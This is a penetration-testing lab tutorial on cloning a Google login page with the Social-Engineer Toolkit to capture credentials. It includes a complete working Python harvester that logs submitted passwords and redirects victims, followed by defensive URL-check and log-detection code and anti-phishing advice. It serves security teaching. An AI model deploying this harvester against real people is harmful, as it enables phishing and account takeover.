Lab Overview
Lab at a Glance
In this lab we use the Social-Engineer Toolkit (SET), one of the most widely used penetration testing tools for social engineering, to perform a credential harvesting attack. We clone the Google login page, serve it from our Kali Linux VM (192.168.30.46 on the lab network), and capture any username and password submitted through the fake page.
This is one of the most realistic demonstrations of how phishing attacks work in the real world. The victim sees what appears to be a legitimate Google login page; the only visible differences are the raw IP address in the browser's address bar instead of accounts.google.com, and the browser's "Not secure" indicator, because the page is served over plain HTTP.
This lab must only be performed in an isolated, controlled lab environment on machines and accounts you own or have explicit written permission to test. Using SET against real users or live websites without authorisation is a criminal offence. All experiments here use a controlled victim device on a private lab network.
What is the Social-Engineer Toolkit (SET)?
The Social-Engineer Toolkit (SET) was created by David Kennedy (ReL1K) and is maintained by TrustedSec. It is an open-source Python-driven framework specifically designed for social engineering attacks. It automates complex attack scenarios that previously required deep technical knowledge — making it one of the most democratised and dangerous tools in a penetration tester's kit.
SET is pre-installed in Kali Linux and is listed under the Social Engineering category of tools. It covers attacks from spear-phishing and website cloning to wireless access point spoofing and PowerShell payloads.
| SET Attack Module | What It Does | Real-World Use |
|---|---|---|
| Spear-Phishing Attack Vectors | Sends targeted malicious emails with payloads | APT initial access campaigns |
| Website Attack Vectors | Clones websites and harvests credentials or delivers exploits | Credential theft, phishing portals |
| Infectious Media Generator | Creates malicious USB/CD autorun payloads | Physical access attacks |
| Create a Payload and Listener | Generates reverse shells and Meterpreter payloads | Remote access establishment |
| Wireless Access Point Attack | Creates a rogue AP to intercept traffic | Man-in-the-middle attacks |
| Powershell Attack Vectors | Executes PowerShell-based payloads in memory | Fileless malware attacks |
SET's power comes from automation. Cloning a website, setting up a listener, and capturing credentials would normally require hours of manual web development and server configuration. SET reduces this to a few menu selections and an IP address — which is exactly why defenders need to understand it deeply. You cannot defend against what you do not understand.
Step 1 — Launching the Social-Engineer Toolkit
Open a root terminal in Kali Linux and launch SET with the command setoolkit. SET needs root privileges because the credential harvester binds to port 80 to serve the cloned website.
Type 2 and press Enter to enter the Website Attack Vectors module.
Port 80 is a privileged port (below 1024), which on Linux only root, or a process granted the CAP_NET_BIND_SERVICE capability, may bind by default. If you see a permission error, make sure you are in a root terminal (the prompt shows root@kali) rather than a regular user terminal, or launch it with sudo setoolkit.
Step 2 — Website Attack Vectors Module
After selecting option 2 from the main menu, SET displays the full Website Attack Vectors sub-menu with 10 different web-based attack methods.
Type 3 and press Enter to enter the Credential Harvester Attack Method.
SET explains that the Web Attack module utilises multiple web-based attacks to compromise the intended victim. The Credential Harvester specifically uses website cloning combined with a POST request interceptor — every form submission on the cloned page is silently forwarded to our Kali machine before being redirected to the real website.
Step 3 — Credential Harvester Attack Method
Inside the Credential Harvester module, SET offers three ways to build the fake page: Web Templates (built-in copies of popular login pages), Site Cloner (downloads and replicates a live site) and Custom Import (your own HTML). We use Site Cloner.
SET also reminds you that what happens after a capture is controlled by the HARVESTER_REDIRECT and HARVESTER_URL settings in /etc/setoolkit/set.config: with HARVESTER_REDIRECT=ON, the victim is sent to HARVESTER_URL once their POST has been recorded. When a victim visits the cloned page and submits their login credentials, their browser sends an HTTP POST request exactly as it would to the real website. SET intercepts this POST, extracts every form field (including the password), logs them to a local file, and then forwards the victim on to the real website. The victim typically notices nothing unusual: the real Google page loads, so they assume the first attempt simply failed and try again.
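To make the three steps concrete (rewrite the form action, capture the POST, redirect to the real site), here is a stripped-down harvester in Python written for this edition as an illustration of the mechanism SET automates; it is not SET's own code. The cloned page is a constructed stand-in for a downloaded login form, with the field names (Email, Passwd, GALX) that the lab captures later; the listener address, redirect target and log file name are assumptions for a private lab network.

```python
"""Lab-only mock of the credential-harvester mechanism (added example, not SET code)."""
import logging
import re
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

# Assumptions for this example: harvester IP, post-capture redirect target
# (the role HARVESTER_URL plays in set.config) and a local log file.
HARVESTER_IP = "192.168.30.46"
REDIRECT_URL = "https://accounts.google.com/"
LOG_FILE = "harvester.txt"

# Constructed stand-in for a downloaded login page. A real clone would be the
# saved HTML of the target site, with the same kind of form inside it.
CLONED_PAGE = """<html><body>
<form id="gaia_loginform" action="https://accounts.google.com/ServiceLoginAuth" method="post">
  <input type="hidden" name="GALX" value="abc123">
  <input type="email" name="Email">
  <input type="password" name="Passwd">
  <input type="submit" value="Sign in">
</form></body></html>"""

# Field names that carry credentials; everything else in the POST is a token
# or telemetry field that rode along with the form (GALX, dsh, bgresponse, ...).
CREDENTIAL_FIELDS = {"email", "user", "username", "login", "passwd", "password", "pass", "pwd"}

FORM_ACTION = re.compile(r'(<form\b[^>]*?\baction=)(["\'])(.*?)\2', re.IGNORECASE | re.DOTALL)


def rewrite_form_actions(page: str, post_back: str) -> str:
    """Step 1 (clone time): point every <form action=...> at the harvester."""
    return FORM_ACTION.sub(lambda m: f"{m.group(1)}{m.group(2)}{post_back}{m.group(2)}", page)


def parse_post_body(body: bytes) -> dict:
    """Step 2 (capture): decode a form-urlencoded POST body into field -> value."""
    fields = parse_qs(body.decode("utf-8", errors="replace"), keep_blank_values=True)
    return {name: values[0] for name, values in fields.items()}


def classify_fields(fields: dict) -> dict:
    """Split the captured POST into credentials and the tokens submitted with them."""
    creds = {k: v for k, v in fields.items() if k.lower() in CREDENTIAL_FIELDS}
    tokens = {k: v for k, v in fields.items() if k.lower() not in CREDENTIAL_FIELDS}
    return {"credentials": creds, "tokens": tokens}


class HarvesterHandler(BaseHTTPRequestHandler):
    cloned = rewrite_form_actions(CLONED_PAGE, f"http://{HARVESTER_IP}/")

    def do_GET(self):
        # Serve the rewritten clone for any path (the lab also sees /favicon.ico requests).
        body = self.cloned.encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        captured = classify_fields(parse_post_body(self.rfile.read(length)))
        logging.info("hit from %s: %s", self.client_address[0], captured)
        # Step 3 (redirect): bounce the victim to the real site, as HARVESTER_REDIRECT=ON does.
        self.send_response(302)
        self.send_header("Location", REDIRECT_URL)
        self.send_header("Content-Length", "0")
        self.end_headers()


if __name__ == "__main__":
    logging.basicConfig(filename=LOG_FILE, level=logging.INFO, format="%(asctime)s %(message)s")
    # Port 80 needs root or CAP_NET_BIND_SERVICE; bind all interfaces so lab devices can reach it.
    HTTPServer(("0.0.0.0", 80), HarvesterHandler).serve_forever()
```

Run it as root on the Kali VM and browse to it from a lab device; each submission lands in harvester.txt split into credentials and tokens, and the browser ends up on the real login page exactly as the lab describes. The regex rewrite is the weak point of any clone: forms whose action is set by JavaScript, or that post JSON via fetch(), are not caught, which is one reason SET's results vary between target sites.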
Step 4 — Enter IP Address and Clone Google
SET asks for two pieces of information before starting the harvester server: the IP address that victims will connect to (our Kali machine's IP), and the URL of the website to clone.
SET first asks for the IP address for the POST back, which is our Kali VM's LAN IP (192.168.30.46). This is the address that will appear in the victim's browser address bar instead of google.com. SET also displays the configuration notice about the redirect settings at this point.
| Prompt | What to Enter | Notes |
|---|---|---|
| IP address for POST back | 192.168.30.46 | Your Kali machine's LAN IP — run ip addr to confirm yours |
| URL to clone | http://www.google.com | SET downloads and replicates the page in seconds; note that www.google.com is the search page, so point this at the sign-in URL (accounts.google.com) if you want the login form cloned |
| Template selection | 2 (Google) | Applies to the Web Templates method, where Google is built-in option 2; Site Cloner needs only the URL |
After entering the IP address, SET builds the fake page. For the Google login page in this lab we use template 2, the built-in Google page offered by the Web Templates method; if you take the Site Cloner route instead, SET downloads the URL you gave it. Either way, SET rewrites every form action attribute to POST back to our Kali machine and launches a lightweight web server on port 80.
SET's terminal now logs GET requests for / and /favicon.ico from IP addresses in the 192.168.30.x subnet as lab devices connect. The credential harvester is running: any device on the same network that navigates to http://192.168.30.46 will see what appears to be the Google login page, and every form submission is captured by SET in real time.
Step 5 — Viewing the Fake Page and Capturing Credentials
The Victim's Perspective — The Fake Google Login Page
On any device connected to the same network, open a browser and navigate to http://192.168.30.46. The victim sees a convincing replica of the Google login page, complete with the Google logo, Sign in button, and "Create an account" link.
The address bar shows 192.168.30.46 instead of accounts.google.com, and the browser shows "Not secure" because SET serves the page over HTTP, not HTTPS. In a real attack the page would sit on a registered look-alike domain with a valid TLS certificate, so the padlock would be present and only careful inspection of the domain name would give it away.
The Attacker's Perspective — Credentials Arrive in Real Time
When the victim enters their email and password and clicks Sign in, SET captures the credentials immediately and prints them in the terminal. Press Ctrl+C when finished and SET writes the captured data to a report in its reports directory.
SET has captured the victim's Google account email and password in plain text. In this controlled lab, these are test credentials used specifically for demonstration. In a real attack, these would give the attacker full access to the victim's Google account — email, drive, photos, linked services, and any other accounts using the same password.
Notice that SET captures every POST parameter, not just the password: the GALX and dsh values are state and anti-CSRF tokens tied to that page load, and bgresponse=js_disabled is a bot-detection field. These pre-login tokens are not session cookies and cannot be replayed as an authenticated session. The more serious variant is a phishing kit that relays the login to the real site in real time and captures the post-login session cookie; that cookie stays valid until the service revokes existing sessions, which is why "change your password" alone is not a complete remediation.
Defensive Measures — How to Protect Against Phishing
Now that we understand how credential harvesting works, here are the most effective defences — both for individual users and organisations:
🔍 Always Check the URL — Not Just the Page Appearance
The only reliable indicator of a fake page is the domain name in the address bar. Train users to verify the domain before entering any credentials: 192.168.30.46 is not Google; neither is googl3.com nor accounts.google.com.login-secure.net, where the registrable domain is login-secure.net. The real Google login is always at accounts.google.com over HTTPS. The padlock on its own proves nothing about legitimacy, since phishing sites on registered domains obtain valid certificates too; the domain is what must be checked.
🔐 Enable Two-Factor Authentication (2FA) on All Accounts
Even if an attacker captures your password, a second factor stops a simple harvester like this one from logging in: the stolen password is useless without it. Be precise about the limits, though. SMS codes and authenticator-app codes can themselves be phished by kits that relay the login to the real site in real time and prompt for the code; only phishing-resistant MFA (FIDO2/WebAuthn security keys and passkeys), which binds the credential to the genuine origin, defeats credential phishing completely. Turn on the strongest factor the account supports.
🔑 Use a Password Manager
Password managers fill credentials only on the exact domain they were saved for, so they will not auto-fill on a phishing page whose domain does not match. This protects even users who are not diligently checking URLs, with one caveat: if the manager refuses to fill on a page that looks right, treat that as a warning sign rather than copying the password in by hand.
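The "check the URL" advice and the password manager's autofill rule are the same origin check, and both of the look-alike examples above are cases where naive matching goes wrong. The following function is an added example written for this page, not code from any password manager; the allowlist of login hosts is an assumption, and real managers match on the registrable domain using the Public Suffix List rather than on exact host names.

```python
"""Added example: the origin check behind 'check the URL' and password-manager autofill."""
from ipaddress import ip_address
from urllib.parse import urlsplit

# Assumed allowlist for the demo. Real password managers match on the
# registrable domain (using the Public Suffix List); exact hosts keep this
# example dependency-free and strict.
GOOGLE_LOGIN_HOSTS = {"accounts.google.com"}


def check_login_url(url: str, allowed_hosts=GOOGLE_LOGIN_HOSTS):
    """Return (ok, reason). ok is True only for https to an allowlisted host."""
    parts = urlsplit(url)
    # .hostname is already lower-cased with userinfo and port stripped;
    # a trailing dot (accounts.google.com.) is an equivalent spelling.
    host = (parts.hostname or "").rstrip(".")
    if parts.scheme != "https":
        return False, f"not https (scheme is {parts.scheme or 'missing'})"
    if not host:
        return False, "no host in URL"
    if parts.username is not None:
        # https://accounts.google.com@192.168.30.46/ : the text before '@' is
        # userinfo; the browser actually connects to the host after it.
        return False, f"userinfo before '@'; real host is {host}"
    try:
        ip_address(host)
        return False, f"raw IP address {host}, not a domain"
    except ValueError:
        pass
    if host.startswith("xn--") or ".xn--" in host:
        return False, f"punycode label in {host}; possible homograph"
    if host in allowed_hosts:
        return True, f"{host} is an allowlisted login host"
    # accounts.google.com.login-secure.net ends in login-secure.net; matching on
    # a substring or suffix such as 'google.com' would wrongly accept it.
    return False, f"{host} is not an allowlisted login host"


def should_autofill(stored_host: str, page_url: str) -> bool:
    """Password-manager rule: fill only when the page origin is the stored host."""
    ok, _ = check_login_url(page_url, {stored_host})
    return ok
```

The order of the checks matters: scheme first, then the userinfo trick, then IP literals and punycode, and only then the allowlist, so that a URL engineered to look like the real host is rejected for the specific reason a user should learn to recognise.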
📧 Never Click Links in Emails — Type URLs Directly
Phishing attacks depend on victims clicking attacker-controlled links. Teach users to navigate to sensitive sites by typing the URL directly into the browser, or using a saved bookmark — never by following a link from an email, SMS, or social media message.
🛡 Deploy Anti-Phishing DNS and Email Filtering
At the organisational level, deploy DNS filtering (e.g., Cisco Umbrella, Cloudflare Gateway) to block access to known phishing domains and newly registered look-alikes. Configure email filters to quarantine messages with suspicious links and flag external emails with warning banners. Implement SPF, DKIM and DMARC so that mail spoofing your own domain is rejected; note that these do nothing against look-alike domains the attacker registers, which is what URL checking and filtering are for.
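Filtering blocks what is already known; the harvester in this lab sits on a fresh IP that no blocklist has seen. What a defender can still detect is the traffic pattern the lab describes: a POST to a host that is not a login service, answered by a redirect to the real one. The following detection is an added example for this page with constructed, tab-separated proxy records and an assumed allowlist of login hosts; it assumes your proxy or gateway logs the request method and the response Location header (for HTTPS sites that requires TLS inspection, whereas the SET harvester is plain HTTP and visible as-is).

```python
"""Added example: spotting harvester-style POSTs in web-proxy logs (constructed sample data)."""
from ipaddress import ip_address
from urllib.parse import urlsplit

# Assumed allowlist of legitimate login hosts for the organisation.
KNOWN_LOGIN_HOSTS = {"accounts.google.com", "login.microsoftonline.com"}

# Constructed proxy/gateway records, one per line, tab-separated:
# ts  src_ip  method  host  uri  status  response Location header ("-" if none)
SAMPLE_LOG = """\
1714000000.1\t192.168.30.51\tGET\t192.168.30.46\t/\t200\t-
1714000002.3\t192.168.30.51\tPOST\t192.168.30.46\t/\t302\thttps://accounts.google.com/
1714000010.0\t192.168.30.52\tPOST\taccounts.google.com\t/signin\t200\t-
1714000020.5\t192.168.30.53\tPOST\tlogin.corp.example\t/auth\t302\t/home
1714000030.0\t192.168.30.54\tPOST\tgoogl3.com\t/login\t302\thttps://accounts.google.com/
1714000040.2\t192.168.30.55\tPOST\taccounts.google.com.login-secure.net\t/\t302\thttps://accounts.google.com/
"""

FIELDS = ("ts", "src_ip", "method", "host", "uri", "status", "location")


def is_ip_literal(host: str) -> bool:
    try:
        ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def harvester_reasons(rec: dict) -> list:
    """Rules for one POST record; each match is returned as a human-readable reason."""
    host = rec["host"].lower()
    reasons = []
    if is_ip_literal(host):
        reasons.append(f"POST to raw IP host {host}")
    # Lookalike: a known login host embedded inside a longer, different host name.
    if host not in KNOWN_LOGIN_HOSTS and any(k in host for k in KNOWN_LOGIN_HOSTS):
        reasons.append(f"lookalike host {host} embeds a known login host")
    # Redirect-after-POST to the real login site is the harvester's tell:
    # credentials went to one host, the victim was bounced to another.
    redirect_host = (urlsplit(rec["location"]).hostname or "") if rec["location"] != "-" else ""
    if redirect_host in KNOWN_LOGIN_HOSTS and host not in KNOWN_LOGIN_HOSTS:
        reasons.append(f"POST to {host} redirected to legitimate login host {redirect_host}")
    return reasons


def detect_harvester_posts(log_text: str) -> list:
    """Return one alert per POST record that trips at least one rule."""
    alerts = []
    for line in log_text.strip().splitlines():
        rec = dict(zip(FIELDS, line.split("\t")))
        if rec.get("method") != "POST":
            continue
        reasons = harvester_reasons(rec)
        if reasons:
            alerts.append({"ts": rec["ts"], "src_ip": rec["src_ip"], "host": rec["host"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_harvester_posts(SAMPLE_LOG):
        print(alert["ts"], alert["src_ip"], "->", alert["host"], "|", "; ".join(alert["reasons"]))
```

Against the sample, the harvester POST to 192.168.30.46, the googl3.com POST and the accounts.google.com.login-secure.net POST are flagged, while the genuine sign-in and the internal corp login are not. The redirect rule is the most robust of the three because it does not depend on how the attacker named the host; the source IP in each alert tells the responder which user to contact for a password reset and session revocation.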
📚 Regular Security Awareness Training
Run simulated phishing exercises using tools like GoPhish to measure and improve user awareness. Vendor benchmark reports consistently show click rates falling markedly over the first year of a regular simulation programme, and awareness training remains one of the most cost-effective defences available.
Conclusion & Learning Outcomes
In this lab we successfully launched the Social-Engineer Toolkit, navigated to the Website Attack Vectors module, selected the Credential Harvester with Site Cloner, built the fake Google login page, served it from our Kali machine, and captured the test credentials entered by a victim device on our lab network, all in under 30 minutes.
This demonstrates one of the most important principles in cybersecurity: technical security controls are bypassed completely when the human is the target. No firewall, antivirus, or IDS/IPS can stop a user from willingly entering their password into a convincing fake page. This is why phishing remains one of the most common initial access vectors in breach reports year after year.
Attack Flow Summary
After this lab, you can:
- Explain what the Social-Engineer Toolkit (SET) is and what attack categories it covers
- Launch SET and navigate its menu structure to the Website Attack Vectors module
- Configure and run the Credential Harvester with Site Cloner against a target URL
- Explain what the fake Google login page looks like from the victim's perspective
- Interpret the SET terminal output when credentials are captured
- Explain which forms of 2FA stop a simple credential harvester and why only phishing-resistant MFA defeats phishing completely
- Implement at least 4 defences against phishing in an organisational context
- Map this attack to the correct MITRE ATT&CK tactics and techniques
MITRE ATT&CK Mapping
In the next lab we explore Metasploit Framework — using it to scan for vulnerabilities, select exploit modules, gain a reverse shell on a target machine, and explore Meterpreter post-exploitation capabilities including privilege escalation and credential dumping.